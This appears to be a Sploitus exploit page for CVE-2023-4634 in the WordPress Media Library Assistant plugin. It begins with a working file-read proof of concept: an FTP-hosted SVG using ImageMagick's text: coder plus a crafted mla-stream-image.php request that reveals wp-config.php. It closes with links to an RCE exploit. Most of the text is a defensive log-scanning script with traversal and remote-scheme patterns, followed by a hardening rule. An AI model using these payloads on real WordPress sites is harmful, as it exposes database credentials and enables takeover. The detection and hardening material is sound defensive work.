## https://sploitus.com/exploit?id=WPEX-ID:E07091B7-2168-4DA3-8CF3-7669F0DD823D
LFI:

1. Set up a local FTP server. This may be done using python as follows:

```shell
python3 -m pyftpdlib -p 2122
```

2. Add files `lfi.svg` and `lfi.svg[0]` with the following content:

```xml
<svg width="500" height="500"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     xmlns="http://www.w3.org/2000/svg">
  <image xlink:href="text:../../../../wp-config.php" width="500" height="500" />
</svg>
```

3. Ensure that ImageMagick on the server supports the SVG format (`identify -list format | grep -i svg`).

4. Visit `/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://FTP_SERVER:FTP_PORT/lfi.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600` with correct values of FTP_SERVER and FTP_PORT to view the contents of the `wp-config.php` file.
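The request in step 4 leaves a recognisable trace in the web server's access log: a hit on `mla-stream-image.php` whose `mla_stream_file` value is a remote URL (here `ftp://`) or a traversal path rather than an upload reference. The following Python script is an added detection example, not code from the advisory, the Patrowl research, or the plugin; it scans constructed access-log lines for that pattern. The sample lines, IP addresses and the "benign" streaming request are all made up for the example, and the rule that a local path under `wp-content/uploads/` is benign is an assumption about normal plugin usage.

```python
"""Flag Media Library Assistant streaming requests that look like the LFI PoC.

Added example: scans combined-format access-log lines for requests to
mla-stream-image.php whose mla_stream_file parameter carries a remote URL
scheme or path traversal. It is a detection aid, not the plugin's own code.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "mla-stream-image.php"
# Schemes that should never appear in a file reference for this endpoint.
REMOTE_SCHEMES = ("ftp://", "ftps://", "http://", "https://", "php://", "data:")

# Request line inside a combined-log-format entry: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_target(target: str) -> list:
    """Return the reasons a request target looks like an abuse attempt.

    An empty list means the target is not the streaming endpoint or carries
    nothing suspicious.
    """
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for raw in params.get("mla_stream_file", []):
        # parse_qs already decoded once; decode again to catch double encoding.
        value = unquote(unquote(raw)).strip().lower()
        if value.startswith(REMOTE_SCHEMES):
            reasons.append(f"remote scheme in mla_stream_file: {value}")
        if "../" in value or "..\\" in value:
            reasons.append(f"path traversal in mla_stream_file: {value}")
    if "mla_debug" in params:
        # The published PoC request sets mla_debug=log; treat it as a weak signal.
        reasons.append("mla_debug parameter set")
    return reasons


def scan_log(lines) -> list:
    """Return (line_number, reasons) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = classify_target(match.group("target"))
        if reasons:
            hits.append((number, reasons))
    return hits


# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /wp-content/uploads/2023/10/photo.jpg HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:12:00:02 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=wp-content/uploads/2023/10/doc.pdf&mla_stream_width=150 HTTP/1.1" 200 8192',
    '198.51.100.7 - - [10/Oct/2023:12:00:03 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp%3A%2F%2F198.51.100.7%3A2122%2Flfi.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [10/Oct/2023:12:00:04 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```

Run against the constructed log, lines 3 and 4 are reported and lines 1 and 2 are not. Log matching is only a backstop: the read primitive itself comes from ImageMagick's `text:` coder being reachable from an SVG, so on the server side the durable fix is an ImageMagick `policy.xml` that denies the coders the web application does not need (a `<policy domain="coder" rights="none" pattern="TEXT" />` rule, as in the ImageTragick-era hardening guidance) together with the plugin update described in the linked blog post.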

RCE:

See full details in the blog post, and the exploit script on GitHub:

- https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
- https://github.com/Patrowl/CVE-2023-4634/